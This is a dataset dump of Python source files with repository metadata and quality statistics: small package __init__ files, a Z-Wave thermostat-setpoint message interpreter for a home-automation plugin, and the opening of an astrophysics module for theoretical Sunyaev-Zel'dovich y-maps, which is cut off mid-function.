hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
98f3f13a781eba95c51da57febee705bcf432858
| 81
|
py
|
Python
|
app/admin/__init__.py
|
hXtreme/HCP-Project
|
658beb1103c42666803c00a314d580a74e86d0cc
|
[
"MIT"
] | null | null | null |
app/admin/__init__.py
|
hXtreme/HCP-Project
|
658beb1103c42666803c00a314d580a74e86d0cc
|
[
"MIT"
] | 28
|
2019-11-15T22:34:57.000Z
|
2019-12-23T20:28:30.000Z
|
app/admin/__init__.py
|
hXtreme/HCP-Project
|
658beb1103c42666803c00a314d580a74e86d0cc
|
[
"MIT"
] | 8
|
2019-10-16T19:22:16.000Z
|
2019-12-22T01:29:31.000Z
|
from app.admin.forms import ProviderImportForm
from app.admin.admin import admin
| 27
| 46
| 0.851852
| 12
| 81
| 5.75
| 0.5
| 0.202899
| 0.347826
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.098765
| 81
| 2
| 47
| 40.5
| 0.945205
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c70a85dd5db304cc07710b372880c70b718a56bb
| 88
|
py
|
Python
|
src/pypixel/__init__.py
|
savagedevelops/pypixelapi
|
cdb907ee0b58b9355d92c006953997bfc3062882
|
[
"MIT"
] | null | null | null |
src/pypixel/__init__.py
|
savagedevelops/pypixelapi
|
cdb907ee0b58b9355d92c006953997bfc3062882
|
[
"MIT"
] | null | null | null |
src/pypixel/__init__.py
|
savagedevelops/pypixelapi
|
cdb907ee0b58b9355d92c006953997bfc3062882
|
[
"MIT"
] | null | null | null |
from pypixel.Client import *
from pypixel.Player import *
from pypixel.Skyblock import *
| 29.333333
| 30
| 0.806818
| 12
| 88
| 5.916667
| 0.5
| 0.464789
| 0.478873
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 88
| 3
| 30
| 29.333333
| 0.922078
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c71d96721e411a7fb0826a1679db6ec459f64d4d
| 61
|
py
|
Python
|
mouse/__init__.py
|
vipul-sharma20/audio-mouse
|
7f80ba3a1d1fe757371ad4bd287e252599ca9704
|
[
"MIT"
] | 8
|
2020-04-11T15:22:09.000Z
|
2020-10-10T20:12:00.000Z
|
mouse/__init__.py
|
vipul-sharma20/audio-mouse
|
7f80ba3a1d1fe757371ad4bd287e252599ca9704
|
[
"MIT"
] | null | null | null |
mouse/__init__.py
|
vipul-sharma20/audio-mouse
|
7f80ba3a1d1fe757371ad4bd287e252599ca9704
|
[
"MIT"
] | null | null | null |
from mouse.mouse import LineIn
from mouse.mouse import Mouse
| 20.333333
| 30
| 0.836066
| 10
| 61
| 5.1
| 0.4
| 0.352941
| 0.54902
| 0.784314
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.131148
| 61
| 2
| 31
| 30.5
| 0.962264
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
c73d6e783132bb2640b0f2b20fcf6724e2d68390
| 12,985
|
py
|
Python
|
TRV.indigoPlugin/Contents/Server Plugin/zwave_interpreter/zwave_command_class_thermostat_setpoint.py
|
autolog/TRV_Controller
|
39b40e666cf35dad517335f1bea27a8ab45e2c22
|
[
"MIT"
] | null | null | null |
TRV.indigoPlugin/Contents/Server Plugin/zwave_interpreter/zwave_command_class_thermostat_setpoint.py
|
autolog/TRV_Controller
|
39b40e666cf35dad517335f1bea27a8ab45e2c22
|
[
"MIT"
] | null | null | null |
TRV.indigoPlugin/Contents/Server Plugin/zwave_interpreter/zwave_command_class_thermostat_setpoint.py
|
autolog/TRV_Controller
|
39b40e666cf35dad517335f1bea27a8ab45e2c22
|
[
"MIT"
] | null | null | null |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# Z-Wave Interpreter © Autolog 2020
#
from .zwave_constants import *
from .zwave_constants_interpretation import *
from .zwave_constants_command_classes import *
ZW_THERMOSTAT_SETPOINT = 0x43
ZW_THERMOSTAT_SETPOINT_SET = 0x01
ZW_THERMOSTAT_SETPOINT_GET = 0x02
ZW_THERMOSTAT_SETPOINT_REPORT = 0x03
ZW_THERMOSTAT_SETPOINT_SUPPORTED_GET = 0x04
ZW_THERMOSTAT_SETPOINT_SUPPORTED_REPORT = 0x05
ZW_THERMOSTAT_SETPOINT_CAPABILITIES_GET = 0x09
ZW_THERMOSTAT_SETPOINT_CAPABILITIES_REPORT = 0x0A
ZW_THERMOSTAT_SETPOINT_TYPE_NOT_AVAILABLE = 0x00
ZW_THERMOSTAT_SETPOINT_TYPE_HEATING = 0x01
ZW_THERMOSTAT_SETPOINT_TYPE_COOLING = 0x02
ZW_THERMOSTAT_SETPOINT_TYPE_FURNACE = 0x07
ZW_THERMOSTAT_SETPOINT_TYPE_DRY_AIR = 0x08
ZW_THERMOSTAT_SETPOINT_TYPE_MOIST_AIR = 0x09
ZW_THERMOSTAT_SETPOINT_TYPE_AUTO_CHANGEOVER = 0x0A
ZW_THERMOSTAT_SETPOINT_TYPE_ENERGY_SAVE_HEATING = 0x0B
ZW_THERMOSTAT_SETPOINT_TYPE_ENERGY_SAVE_COOLING = 0x0C
ZW_THERMOSTAT_SETPOINT_TYPE_AWAY_HEATING = 0x0D
ZW_THERMOSTAT_SETPOINT_TYPE_AWAY_COOLING = 0x0E
ZW_THERMOSTAT_SETPOINT_TYPE_FULL_POWER = 0x0F
ZW_THERMOSTAT_SETPOINT_SCALE_CELSIUS = 0x00
ZW_THERMOSTAT_SETPOINT_SCALE_FAHRENHEIT = 0x01
class ZwaveThermostatSetpoint:
"""
Z-Wave Command Class: Thermostat Setpoint "0x43" [Decimal 67]
"""
def __init__(self, exception_handler, logger, utility, command_classes, zw_interpretation):
try:
self.exception_handler = exception_handler
self.logger = logger
self.utility = utility
self.command_classes = command_classes
self.zw_interpretation = zw_interpretation
self.command_classes[ZW_THERMOSTAT_SETPOINT] = dict()
self.command_classes[ZW_THERMOSTAT_SETPOINT][ZW_IDENTIFIER] = u"Thermostat Setpoint"
self.command_classes[ZW_THERMOSTAT_SETPOINT][ZW_COMMANDS] = dict()
self.command_classes[ZW_THERMOSTAT_SETPOINT][ZW_COMMANDS][ZW_THERMOSTAT_SETPOINT_SET] = u"Set"
self.command_classes[ZW_THERMOSTAT_SETPOINT][ZW_COMMANDS][ZW_THERMOSTAT_SETPOINT_GET] = u"Get"
self.command_classes[ZW_THERMOSTAT_SETPOINT][ZW_COMMANDS][ZW_THERMOSTAT_SETPOINT_REPORT] = u"Report"
self.command_classes[ZW_THERMOSTAT_SETPOINT][ZW_COMMANDS][ZW_THERMOSTAT_SETPOINT_SUPPORTED_GET] = u"Supported Get"
self.command_classes[ZW_THERMOSTAT_SETPOINT][ZW_COMMANDS][ZW_THERMOSTAT_SETPOINT_SUPPORTED_REPORT] = u"Supported Report"
self.command_classes[ZW_THERMOSTAT_SETPOINT][ZW_COMMANDS][ZW_THERMOSTAT_SETPOINT_CAPABILITIES_GET] = u"Capabilities Get"
self.command_classes[ZW_THERMOSTAT_SETPOINT][ZW_COMMANDS][ZW_THERMOSTAT_SETPOINT_CAPABILITIES_REPORT] = u"Capabilities Report"
self.zw_thermostat_setpoint_types = dict()
self.zw_thermostat_setpoint_types[ZW_THERMOSTAT_SETPOINT_TYPE_HEATING] = u"Heating"
self.zw_thermostat_setpoint_types[ZW_THERMOSTAT_SETPOINT_TYPE_COOLING] = u"Cooling"
self.zw_thermostat_setpoint_types[ZW_THERMOSTAT_SETPOINT_TYPE_FURNACE] = u"Furnace"
self.zw_thermostat_setpoint_types[ZW_THERMOSTAT_SETPOINT_TYPE_DRY_AIR] = u"Dry Air"
self.zw_thermostat_setpoint_types[ZW_THERMOSTAT_SETPOINT_TYPE_MOIST_AIR] = u"Moist Air"
self.zw_thermostat_setpoint_types[ZW_THERMOSTAT_SETPOINT_TYPE_AUTO_CHANGEOVER] = u"Auto Changeover"
self.zw_thermostat_setpoint_types[ZW_THERMOSTAT_SETPOINT_TYPE_ENERGY_SAVE_HEATING] = u"Energy Save Heating"
self.zw_thermostat_setpoint_types[ZW_THERMOSTAT_SETPOINT_TYPE_ENERGY_SAVE_COOLING] = u"Energy Save Cooling"
self.zw_thermostat_setpoint_types[ZW_THERMOSTAT_SETPOINT_TYPE_AWAY_HEATING] = u"Away Heating"
self.zw_thermostat_setpoint_types[ZW_THERMOSTAT_SETPOINT_TYPE_AWAY_COOLING] = u"Away Cooling"
self.zw_thermostat_setpoint_types[ZW_THERMOSTAT_SETPOINT_TYPE_FULL_POWER] = u"Full Power"
self.zw_thermostat_setpoint_scales = dict()
self.zw_thermostat_setpoint_scales[ZW_THERMOSTAT_SETPOINT_SCALE_CELSIUS] = (u"Celsius (C)", u"º C")
self.zw_thermostat_setpoint_scales[ZW_THERMOSTAT_SETPOINT_SCALE_FAHRENHEIT] = (u"Fahrenheit (F)", u"º F")
except Exception as exception_error:
self.exception_handler(exception_error, True) # Log error and display failing statement
def interpret(self):
try:
if self.zw_interpretation[ZW_COMMAND] == ZW_THERMOSTAT_SETPOINT_SET:
self._interpret_set()
return
elif self.zw_interpretation[ZW_COMMAND] == ZW_THERMOSTAT_SETPOINT_GET:
self._interpret_get()
return
elif self.zw_interpretation[ZW_COMMAND] == ZW_THERMOSTAT_SETPOINT_REPORT:
self._interpret_report()
return
elif self.zw_interpretation[ZW_COMMAND] == ZW_THERMOSTAT_SETPOINT_SUPPORTED_GET:
pass
elif self.zw_interpretation[ZW_COMMAND] == ZW_THERMOSTAT_SETPOINT_SUPPORTED_REPORT:
pass
elif self.zw_interpretation[ZW_COMMAND] == ZW_THERMOSTAT_SETPOINT_CAPABILITIES_GET:
pass
elif self.zw_interpretation[ZW_COMMAND] == ZW_THERMOSTAT_SETPOINT_CAPABILITIES_REPORT:
pass
error_message = self.utility.not_supported(self.zw_interpretation)
self.zw_interpretation[ZW_ERROR_MESSAGE] = error_message
except Exception as exception_error:
self.exception_handler(exception_error, True) # Log error and display failing statement
def _interpret_get(self):
try:
setpoint_type = self.zw_interpretation[ZW_COMMAND_DETAIL][0] & 0B00001111
self.zw_interpretation[ZW_SETPOINT_TYPE] = setpoint_type
if setpoint_type in self.zw_thermostat_setpoint_types:
self.zw_interpretation[ZW_SETPOINT_TYPE_UI] = self.zw_thermostat_setpoint_types[setpoint_type]
else:
self.zw_interpretation[ZW_SETPOINT_TYPE_UI] = u"Setpoint Type {0} unknown".format(setpoint_type)
self.zw_interpretation[ZW_INTERPRETATION_UI] = (u"Class: '{0} [{1}]', Command: '{2}', Setpoint Type: '{3}'"
.format(self.zw_interpretation[ZW_COMMAND_CLASS_UI],
self.zw_interpretation[ZW_COMMAND_CLASS_VERSION_UI],
self.zw_interpretation[ZW_COMMAND_UI],
self.zw_interpretation[ZW_SETPOINT_TYPE_UI]))
self.zw_interpretation[ZW_INTERPRETED] = True
except Exception as exception_error:
self.exception_handler(exception_error, True) # Log error and display failing statement
def _interpret_report(self):
try:
setpoint_type = self.zw_interpretation[ZW_COMMAND_DETAIL][0] & 0B00001111 # noqa [Duplicated code fragment!]
precision, scale, size = self.utility.precision_scale_size(self.zw_interpretation[ZW_COMMAND_DETAIL][1])
if scale in self.zw_thermostat_setpoint_scales:
scale_ui = self.zw_thermostat_setpoint_scales[scale][0]
scale_ui_compact = self.zw_thermostat_setpoint_scales[scale][1]
else:
scale_ui = scale_ui_compact = (u" [Unknown Scale: {0}]".format(scale))
end_value = 2 + size
value = self.utility.bytes_to_int(self.zw_interpretation[ZW_COMMAND_DETAIL][2:end_value])
if self.zw_interpretation[ZW_COMMAND_DETAIL][2] & 0b10000000: # Check if a negative number (high order bit set)
value = self.utility.twos_complement(value, size * 8)
# value = float(value)/10**precision # Set precision e.g. 1859 > 18.59 if precision = 2
value_ui_format = "{{:.{0}f}}".format(precision)
value_ui = value_ui_format.format(float(value) / 10 ** precision)
self.zw_interpretation[ZW_SETPOINT_TYPE] = setpoint_type
if setpoint_type in self.zw_thermostat_setpoint_types:
self.zw_interpretation[ZW_SETPOINT_TYPE_UI] = self.zw_thermostat_setpoint_types[setpoint_type]
else:
self.zw_interpretation[ZW_SETPOINT_TYPE_UI] = u"Setpoint Type {0} unknown".format(setpoint_type)
self.zw_interpretation[ZW_PRECISION] = precision
self.zw_interpretation[ZW_SCALES] = scale
self.zw_interpretation[ZW_SCALE_UI] = scale_ui
self.zw_interpretation[ZW_SCALE_UI_COMPACT] = scale_ui_compact
self.zw_interpretation[ZW_SIZE] = size
self.zw_interpretation[ZW_VALUE] = value
self.zw_interpretation[ZW_VALUE_UI] = value_ui
self.zw_interpretation[ZW_INTERPRETATION_UI] = (u"Class: '{0} [{1}]', Command: '{2}', Setpoint Type: '{3}', Value: '{4}{5}'"
.format(self.zw_interpretation[ZW_COMMAND_CLASS_UI],
self.zw_interpretation[ZW_COMMAND_CLASS_VERSION_UI],
self.zw_interpretation[ZW_COMMAND_UI],
self.zw_interpretation[ZW_SETPOINT_TYPE_UI],
self.zw_interpretation[ZW_VALUE_UI],
self.zw_interpretation[ZW_SCALE_UI_COMPACT]))
self.zw_interpretation[ZW_INTERPRETED] = True
except Exception as exception_error:
self.exception_handler(exception_error, True) # Log error and display failing statement
def _interpret_set(self):
try:
setpoint_type = self.zw_interpretation[ZW_COMMAND_DETAIL][0] & 0B00001111 # noqa [Duplicated code fragment!]
precision, scale, size = self.utility.precision_scale_size(self.zw_interpretation[ZW_COMMAND_DETAIL][1])
if scale in self.zw_thermostat_setpoint_scales:
scale_ui = self.zw_thermostat_setpoint_scales[scale][0]
scale_ui_compact = self.zw_thermostat_setpoint_scales[scale][1]
else:
scale_ui = scale_ui_compact = (u" [Unknown Scale: {0}]".format(scale))
end_value = 2 + size
value = self.utility.bytes_to_int(self.zw_interpretation[ZW_COMMAND_DETAIL][2:end_value])
if self.zw_interpretation[ZW_COMMAND_DETAIL][2] & 0b10000000: # Check if a negative number (high order bit set)
value = self.utility.twos_complement(value, size * 8)
# value = float(value)/10**precision # Set precision e.g. 1859 > 18.59 if precision = 2
value_ui_format = "{{:.{0}f}}".format(precision)
value_ui = value_ui_format.format(float(value) / 10 ** precision)
self.zw_interpretation[ZW_SETPOINT_TYPE] = setpoint_type
if setpoint_type in self.zw_thermostat_setpoint_types:
self.zw_interpretation[ZW_SETPOINT_TYPE_UI] = self.zw_thermostat_setpoint_types[setpoint_type]
else:
self.zw_interpretation[ZW_SETPOINT_TYPE_UI] = u"Setpoint Type {0} unknown".format(setpoint_type)
self.zw_interpretation[ZW_PRECISION] = precision
self.zw_interpretation[ZW_SCALES] = scale
self.zw_interpretation[ZW_SCALE_UI] = scale_ui
self.zw_interpretation[ZW_SCALE_UI_COMPACT] = scale_ui_compact
self.zw_interpretation[ZW_SIZE] = size
self.zw_interpretation[ZW_VALUE] = value
self.zw_interpretation[ZW_VALUE_UI] = value_ui
self.zw_interpretation[ZW_INTERPRETATION_UI] = (u"Class: '{0} [{1}]', Command: '{2}', Setpoint: '{3}', Value: '{4}{5}'"
.format(self.zw_interpretation[ZW_COMMAND_CLASS_UI],
self.zw_interpretation[ZW_COMMAND_CLASS_VERSION_UI],
self.zw_interpretation[ZW_COMMAND_UI],
self.zw_interpretation[ZW_SETPOINT_TYPE_UI],
self.zw_interpretation[ZW_VALUE_UI],
self.zw_interpretation[ZW_SCALE_UI_COMPACT]))
self.zw_interpretation[ZW_INTERPRETED] = True
except Exception as exception_error:
self.exception_handler(exception_error, True) # Log error and display failing statement
| 59.022727
| 138
| 0.657451
| 1,472
| 12,985
| 5.375679
| 0.097147
| 0.069
| 0.217364
| 0.175155
| 0.876406
| 0.81284
| 0.775686
| 0.763554
| 0.745229
| 0.717933
| 0
| 0.018999
| 0.270389
| 12,985
| 219
| 139
| 59.292237
| 0.816128
| 0.051829
| 0
| 0.554913
| 0
| 0.011561
| 0.047565
| 0
| 0
| 0
| 0.007167
| 0
| 0
| 1
| 0.028902
| false
| 0.023121
| 0.017341
| 0
| 0.069364
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c742f727db53990bc4d5800fb2f1dca702f0374d
| 32,820
|
py
|
Python
|
pymsz/Theoretical_models.py
|
weiguangcui/pymsz
|
79d81ef070a02f4109f5307407e0f549f44a8ec7
|
[
"MIT"
] | null | null | null |
pymsz/Theoretical_models.py
|
weiguangcui/pymsz
|
79d81ef070a02f4109f5307407e0f549f44a8ec7
|
[
"MIT"
] | null | null | null |
pymsz/Theoretical_models.py
|
weiguangcui/pymsz
|
79d81ef070a02f4109f5307407e0f549f44a8ec7
|
[
"MIT"
] | null | null | null |
import numpy as np
from pymsz.rotate_data import rotate_data, SPH_smoothing
from astropy.cosmology import FlatLambdaCDM, WMAP7
from astropy.coordinates import SkyCoord
from astropy.time import Time
from pymsz import version
# scipy must >= 0.17 to properly use this!
# from scipy.stats import binned_statistic_2d
class TT_model(object):
r""" Theoretical calculation of y and T_sz -map for the thermal SZ effect.
model = TT_model(model_file, npixel, axis)
Parameters
----------
simudata : the simulation data from load_data
npixel : number of pixels for your image, int.
Assume that x-y always have the same number of pixels.
It can be set to 'AUTO', then it will be decided by the halo radius and AR.
So, npixel='AUTO' and AR=None can not be set at the same time!
axis : can be 'x', 'y', 'z', or a list of degrees [alpha, beta, gamma],
which will rotate the data points by $\alpha$ around the x-axis,
$\beta$ around the y-axis, and $\gamma$ around the z-axis
neighbours: this parameter only works with simulation data (not yt data).
If this is set, it will force the SPH particles smoothed into nearby N
neighbours, HSML from the simulation will be ignored.
If no HSML provided in the simulation, neighbours = 27
AR : angular resolution in arcsec. Default : None.
Cluster's redshift with AR decides the image pixel size.
If None, the whole cluster will be projected to the image with npixel resolution.
The AR will be recalculated if z > 0.
If z = 0, AR is set to 1. Note this makes no sense to the ICRS coordinates.
SD : dimensions for SPH smoothing. Type: int. Default: 2.
Must be 2 or 3!
SP : Faked sky positions in [RA (longitude), DEC (latitude)] in degrees.
Default: [194.95, 27.98], Coma' position.
# Need to find sometime to add lower functions
# If [x,y,z] (len(SP) == 3) of the Earth position in the simulation coordinate (in the same units) is given,
# The pos - [x,y,z] are taken as the J2000 3D coordinates and converted into RA, DEC.
# pxsize : physical/proper pixel size of the image. Type: float, unit: kpc.
# Default: None
# If set, this will invaided the calculation from AR.
Memreduce: Try to reduce the memory in parallel calculation by passing the cKDTree class in SPH_smoothing. This overcomes the
memory cost in the cKDTree query, but should require Python>3.8 to pass the class > 4Gb.
Default: False.
Ncpu : number of CPU for parallel calculation. Type: int. Default: None, all cpus from the
computer will be used.
Note, this parallel calculation is only for the SPH smoothing.
Ntasks : number of tasks for separating the calculation. Type: int. Default: None,
the same number of Ncpu will be used. Ideally, it should be larger than or equal to the number of Ncpu.
Set this to a much larger value if you encounter an 'IO Error: bad message length'
# periodic : periodic condition applied for the SPH smoothing region. Tyep: bool. Default: False.
# periodic condition works for the too fine mesh (which means oversmoothing),
# you can turn this on to avoid small boundary effects. So, this is only for SPH.
redshift : The redshift where we put the cluster for observation,.
Default : None, we will look it from simulation data.
Note : If redshift = 0, the returning results will be y_int, i.e. y*d^2_A,
which takes out the angular diameter distance.
This will also ingore the set of AR. The image pixel size =
2 * cluster radius/npixel, so the npixel MUST NOT be 'AUTO' at redshift = 0.
Highly recommended to *NOT* put the cluster at z = 0.
Note the physical positions of particles are always at the simulation time.
zthick : The thickness in projection direction. Default: None.
If None, use all data from cutting region.
Otherwise set a value in simulation length unit kpc/h normally,
then a slice of data [center-zthick, center+zthick] will be used to make the y-map.
sph_kernel : The kernel used to smoothing the y values. Default : "cubic"
Choose from 'cubic': cubic spline; 'quartic': quartic spline;
'quintic': quintic spline; 'wendland2': Wendland C2; 'wendland4': Wendland C4;
'wendland6': Wendland C6;
Returns
-------
Theoretical projected y-map in a given direction. 2D mesh data right now.
See also
--------
SZ_models for the mock SZ signal at different frequencies.
Notes
-----
This program does not accpte redshift=0 or AR == None with npixel = "AUTO", the npixel is reset to 500.
If npixel is "AUTO" and AR != None, then the whole cluster will project to the image with
npixel = 2*radius/pixelsize, where pxielsize is given by AR.
If z = 0 and AR == None, AR will be reset to 1. Note this makes no sense to the ICRS coordinates.
Example
-------
mm=pymsz.TT_models(simudata, npixel=1024, "z")
"""
def __init__(self, simudata, npixel=500, neighbours=None, axis='z', AR=None, SD=2, SP=[194.95, 27.98],
Memreduce=False, Ncpu=None, Ntasks=None, redshift=None, zthick=None, sph_kernel='cubic'):
if isinstance(npixel, type("")) or isinstance(npixel, type('')):
self.npl = npixel.lower()
else:
self.npl = npixel
self.ngb = neighbours
self.ax = axis
self.ar = AR
if redshift is None:
self.red = simudata.cosmology['z']
else:
self.red = redshift
self.zthick = zthick
self.pxs = None
self.SD = SD
# self.periodic = periodic
self.Memreduce=Memreduce
self.ncpu = Ncpu
self.ntask = Ntasks
self.ydata = np.array([])
self.sph_kn = sph_kernel
# self.ad = 1. # angular diameter distance normalized to 1 kpc
self.sp = SP
if self.ar is None and self.npl == 'auto':
print("Do not accept AR == None and npixel=='AUTO' !! \n The npixel is reset to 500.!")
self.npl = 500
if self.SD not in [2, 3]:
raise ValueError("smoothing dimension must be 2 or 3" % SD)
if simudata.data_type == "snapshot":
self._cal_snap(simudata)
elif simudata.data_type == "yt_data":
self._cal_yt(simudata)
else:
raise ValueError("Do not accept this data type %s"
"Please try to use load_data to get the data" % simudata.data_type)
# def TH_ymap(simd, npixel=500, neighbours=None, axis='z', AR=None, redshift=None):
def _cal_snap(self, simd):
# Kpc = 3.0856775809623245e+21 # cm
simd.prep_ss_TT()
if self.red <= 0. and self.npl == 'auto':
print("Do not accept redshift == 0 and npixel=='AUTO' !!\n The npixel is reset to 500.!")
self.npl = 500
self.cc = simd.center/simd.cosmology['h']/(1+simd.cosmology['z'])
self.rr = simd.radius/simd.cosmology['h']/(1+simd.cosmology['z'])
pos = rotate_data(simd.pos/simd.cosmology['h']/(1+simd.cosmology['z']), self.ax)[0] # to proper distance
if self.zthick is not None:
self.zthick = self.zthick/simd.cosmology['h']/(1+simd.cosmology['z'])
idc = (pos[:, 2] > -self.zthick) & (pos[:, 2] < self.zthick)
pos = pos[idc]
Tszdata = simd.Tszdata[idc]
else:
Tszdata = np.copy(simd.Tszdata)
if isinstance(simd.hsml, type(0)):
# self.ngb = 64
hsml = None
else: # with hsml
# if self.ngb is None: # estimate neighbors
# self.ngb=0
# ids = np.sum((simd.pos - simd.pos[simd.hsml.argmin()])**2, axis=1) <= simd.hsml.min()**2
# if simd.hsml[ids].size > self.ngb:
# self.ngb = simd.hsml[ids].size
# ids = np.sum((simd.pos - simd.pos[simd.hsml.argmax()])**2, axis=1) <= simd.hsml.max()**2
# if simd.hsml[ids].size > self.ngb:
# self.ngb = simd.hsml[ids].size
# self.ngb = np.int32(self.ngb*1.05)+1 #to be safe
# print('self.ngb = ', self.ngb)
if self.zthick is not None:
hsml = simd.hsml[idc]
else:
hsml = np.copy(simd.hsml)
hsml = hsml/simd.cosmology['h']/(1+simd.cosmology['z'])
# else: # have set the neighbors, need to ignore the hsml
# hsml = None
if self.npl != 'auto':
minx = pos[:, 0].min()
maxx = pos[:, 0].max()
miny = pos[:, 1].min()
maxy = pos[:, 1].max()
# if self.SD == 3:
